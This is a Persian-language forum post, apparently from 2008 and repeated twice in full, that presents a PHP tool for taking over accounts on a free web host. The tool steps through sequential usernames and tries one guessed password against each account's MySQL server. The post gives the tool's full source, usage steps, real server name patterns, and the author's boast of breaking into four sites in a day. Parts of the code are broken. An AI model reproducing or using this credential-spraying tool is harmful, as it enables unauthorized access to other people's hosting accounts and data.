۲۱-خرداد-۱۳۸۷, ۲۲:۰۹:۴۹
تا حالا شده که فقط بخواین یک سایت رو هک کنید ؟
در مورد افراد حرفه ای مسلما پاسخ منفیه اما یکی که آماتوره فقط می خواد که یه سایت رو هک کنه براش اصلا مهم نیست که چیه !
من با استفاده از php یه برنامه نوشتم که دقیقا کارش همینه !
شما یه پسورد رو بهش می دین بعد اون آی دی ها رو اسکن می کنه تا یکیشون این پسورد رو داشته باشه بعد براتون پیام می ده!
من فعلا اینو به صورت demo تو سایت :
Agary.byethost 17.com/AA.php
گذاشتم . البته فعلا چون حوصله نداشتم فقط هاست های free بایت هاست (byethost.com) رو هک می کنه ولی خوب چند تا اشکال اساسی داره:
1. سرعتش کمه (البته می تونه برا هاست هم باشه)
2. بعد از یه مدتی کار به صورت ناقص تموم می شه (یه راه حل براش پیدا کردم مثلا این سایت یه سری از یوزر ها رو اسکن کرده حالا که از کار افتاده آخرین عددش به این صورته : b16_1223476 شما باید 1223476 رو کپی کنید و دکمه ی بک رو بزنید بعد به جای فیلد from این عدد رو وارد کنید بعد باقی فیلد ها رو مثل قبل پر کنید )
3. شانس در اینجا مهم ترین نقش رو داره
4. باید رنج یوزر ها رو داشته باشید و روش نگارششون رو
5. باید آدرس MySQL سایت رو داشته باشید.
و ... (نکته : با تمام این اشکالاتش روی بایت هاست جواب می ده)
روش کار : (در مثال های زیر همه دررابطه با بایت هاست گفته شده)
1. فیلد from رو پر کنید : من عدد 1000000 رو انتخاب کردم.
2. فیلد upto رو پر کنید : من عدد 1999999 رو انتخاب کردم.
3. فیلد start with رو پر کنید : من در اینجا چون مربوط به بایت هاسته عدد 16 رو انتخاب کردم (در زیر بیشتر توضیح می دم).
4. فیلد server name رو پر کنید : در اینجا منظور آدرس mysql هست که sql100.byehost 16.com می شه.
5. فیلد pass word رو پر کنید : من عدد 12345678 رو انتخاب کردم.
6. حالا دکمه ی مربوطه رو فشار بدید .
7. صبر کنید :
A: اگر عملیات بعد یه مدت متوقف شد : مثلا این سایت یه سری از یوزر ها رو اسکن کرده حالا که از کار افتاده آخرین عددش به این صورته : b16_1223476 شما باید 1223476 رو کپی کنید و دکمه ی بک رو بزنید بعد به جای فیلد from این عدد رو وارد کنید بعد باقی فیلد ها رو مثل قبل پر کنید . (که در بالا هم توضیح دادم)
B: اگر عملیات یک سایت رو با این ویژگی ها پیدا کنه پیام : you did it ! و در پایینش it has been finished ! ظاهر می شه که باید به آدرس panel.byethost .com رجوع کنید و
password : 12345678
username : b16_xxxxxxx
خواهد بود .
C: اگر عملیات هیچ سایتی با این ویژگی ها پیدا نکنه وقتی که به غددی که داخل فیلد upto وارد کردین می رسه پیغام : it has been finished ! ظاهر می شه و در پایینش یک دکمه که شما رو به AA.php دوباره رجوع می ده و عملیات از اول ....
درباره ی بایت هاست :
اگر داشته باشیم xxxxxx.byethos t13.com آدرس MySQL هست sql110.byethos t13.com => فیلد start with : 13
اگر داشته باشیم xxxxxx.byethos t16.com آدرس MySQL هست sql100.byethos t16.com => فیلد start with : 16
اگر داشته باشیم xxxxxx.byethos t17.com آدرس MySQL هست sql100.byethos t17.com => فیلد start with : 17
در نهایت بایت هاست خیلی بیش تر از اینها سیستم داره ولی من فقط همینا رو بلدم اگر دنبال باقی کار ها هستید باید پورت مربوط به MySQL رو پیدا کنید و آدرس MySQL به صورت این نوشته می شه byethostXX.com:PORT num
(نکته این روش میتونه در تمام سایت هایی که یوزر و پسوردشون که مربوط به اس کیو ال هست با یوزر و پسور تمام بخش های مربوط به سایت یکیه استفاده بشه مانند بایت هاست و مشتقات مربوط به اون)
در نهایت هم اضافه می کنم که من با این روش تونستم در مدت یک شبانه روز چهار تا سایت رو که از پسورد 12345678 استفاده می کردن هک کنم . پس باید درست حدس زد !
خوب اینم آخر کار امیدوارم که دوستان جسارت من رو ببخشن اگر اشتباهی در برنامه یا متن نوشته دارم از مدیران محترم خواهش می کنم که اون رو اصلاح کنن .
با تشکر.
پ .ن : در زیر کد های برنامه قرار داره :
<?php
function Amin ($u ,$v , $w , $y , $z)
{
for ($v ; $v <= $w ; $v++)
{
$x = "b" . $u . "_" . $v ;
$con = mysql_connect($y , $x , $z) ;
if ($con)
{
echo " you did it !";
echo $x;
break ;
}
else if (! $con)
{
echo $x;
}
}
echo "</br>" . "It has been finished !" ;
}
?>
فایل A
<html>
<body><form action="AAA.php" method="post">
From: <input type="text" name="from" />
Up to: <input type="text" name="upto" />
</br>
</br>
Start With : <input type="text" name="startwith" />
Server Name : <input type="text" name="servername" />
Pass Word : <input type="text" name="password" />
</br>
<input type="submit" />
</form></body>
</html>
فایل AA
<html>
<body>
<?php
include ("A.php") ;
Amin ($_POST["startwith"] ,$_POST["from"] , $_POST["upto"] , $_POST["servername"] , $_POST["password"] ) ;
?>
<form action="AA.php" method="post">
<form action="AAAA.php" method="post">
<input type="submit" />
</form>
</body>
</html>
فایل AAA
<?php
include (A.php) ;
codemysql_clos e($con);
?>
فایل AAAA
پایان
در مورد افراد حرفه ای مسلما پاسخ منفیه اما یکی که آماتوره فقط می خواد که یه سایت رو هک کنه براش اصلا مهم نیست که چیه !
من با استفاده از php یه برنامه نوشتم که دقیقا کارش همینه !
شما یه پسورد رو بهش می دین بعد اون آی دی ها رو اسکن می کنه تا یکیشون این پسورد رو داشته باشه بعد براتون پیام می ده!
من فعلا اینو به صورت demo تو سایت :
Agary.byethost 17.com/AA.php
گذاشتم . البته فعلا چون حوصله نداشتم فقط هاست های free بایت هاست (byethost.com) رو هک می کنه ولی خوب چند تا اشکال اساسی داره:
1. سرعتش کمه (البته می تونه برا هاست هم باشه)
2. بعد از یه مدتی کار به صورت ناقص تموم می شه (یه راه حل براش پیدا کردم مثلا این سایت یه سری از یوزر ها رو اسکن کرده حالا که از کار افتاده آخرین عددش به این صورته : b16_1223476 شما باید 1223476 رو کپی کنید و دکمه ی بک رو بزنید بعد به جای فیلد from این عدد رو وارد کنید بعد باقی فیلد ها رو مثل قبل پر کنید )
3. شانس در اینجا مهم ترین نقش رو داره
4. باید رنج یوزر ها رو داشته باشید و روش نگارششون رو
5. باید آدرس MySQL سایت رو داشته باشید.
و ... (نکته : با تمام این اشکالاتش روی بایت هاست جواب می ده)
روش کار : (در مثال های زیر همه دررابطه با بایت هاست گفته شده)
1. فیلد from رو پر کنید : من عدد 1000000 رو انتخاب کردم.
2. فیلد upto رو پر کنید : من عدد 1999999 رو انتخاب کردم.
3. فیلد start with رو پر کنید : من در اینجا چون مربوط به بایت هاسته عدد 16 رو انتخاب کردم (در زیر بیشتر توضیح می دم).
4. فیلد server name رو پر کنید : در اینجا منظور آدرس mysql هست که sql100.byehost 16.com می شه.
5. فیلد pass word رو پر کنید : من عدد 12345678 رو انتخاب کردم.
6. حالا دکمه ی مربوطه رو فشار بدید .
7. صبر کنید :
A: اگر عملیات بعد یه مدت متوقف شد : مثلا این سایت یه سری از یوزر ها رو اسکن کرده حالا که از کار افتاده آخرین عددش به این صورته : b16_1223476 شما باید 1223476 رو کپی کنید و دکمه ی بک رو بزنید بعد به جای فیلد from این عدد رو وارد کنید بعد باقی فیلد ها رو مثل قبل پر کنید . (که در بالا هم توضیح دادم)
B: اگر عملیات یک سایت رو با این ویژگی ها پیدا کنه پیام : you did it ! و در پایینش it has been finished ! ظاهر می شه که باید به آدرس panel.byethost .com رجوع کنید و
password : 12345678
username : b16_xxxxxxx
خواهد بود .
C: اگر عملیات هیچ سایتی با این ویژگی ها پیدا نکنه وقتی که به غددی که داخل فیلد upto وارد کردین می رسه پیغام : it has been finished ! ظاهر می شه و در پایینش یک دکمه که شما رو به AA.php دوباره رجوع می ده و عملیات از اول ....
درباره ی بایت هاست :
اگر داشته باشیم xxxxxx.byethos t13.com آدرس MySQL هست sql110.byethos t13.com => فیلد start with : 13
اگر داشته باشیم xxxxxx.byethos t16.com آدرس MySQL هست sql100.byethos t16.com => فیلد start with : 16
اگر داشته باشیم xxxxxx.byethos t17.com آدرس MySQL هست sql100.byethos t17.com => فیلد start with : 17
در نهایت بایت هاست خیلی بیش تر از اینها سیستم داره ولی من فقط همینا رو بلدم اگر دنبال باقی کار ها هستید باید پورت مربوط به MySQL رو پیدا کنید و آدرس MySQL به صورت این نوشته می شه byethostXX.com:PORT num
(نکته این روش میتونه در تمام سایت هایی که یوزر و پسوردشون که مربوط به اس کیو ال هست با یوزر و پسور تمام بخش های مربوط به سایت یکیه استفاده بشه مانند بایت هاست و مشتقات مربوط به اون)
در نهایت هم اضافه می کنم که من با این روش تونستم در مدت یک شبانه روز چهار تا سایت رو که از پسورد 12345678 استفاده می کردن هک کنم . پس باید درست حدس زد !
خوب اینم آخر کار امیدوارم که دوستان جسارت من رو ببخشن اگر اشتباهی در برنامه یا متن نوشته دارم از مدیران محترم خواهش می کنم که اون رو اصلاح کنن .
با تشکر.
پ .ن : در زیر کد های برنامه قرار داره :
<?php
function Amin ($u ,$v , $w , $y , $z)
{
for ($v ; $v <= $w ; $v++)
{
$x = "b" . $u . "_" . $v ;
$con = mysql_connect($y , $x , $z) ;
if ($con)
{
echo " you did it !";
echo $x;
break ;
}
else if (! $con)
{
echo $x;
}
}
echo "</br>" . "It has been finished !" ;
}
?>
فایل A
<html>
<body><form action="AAA.php" method="post">
From: <input type="text" name="from" />
Up to: <input type="text" name="upto" />
</br>
</br>
Start With : <input type="text" name="startwith" />
Server Name : <input type="text" name="servername" />
Pass Word : <input type="text" name="password" />
</br>
<input type="submit" />
</form></body>
</html>
فایل AA
<html>
<body>
<?php
include ("A.php") ;
Amin ($_POST["startwith"] ,$_POST["from"] , $_POST["upto"] , $_POST["servername"] , $_POST["password"] ) ;
?>
<form action="AA.php" method="post">
<form action="AAAA.php" method="post">
<input type="submit" />
</form>
</body>
</html>
فایل AAA
<?php
include (A.php) ;
codemysql_clos e($con);
?>
فایل AAAA
پایان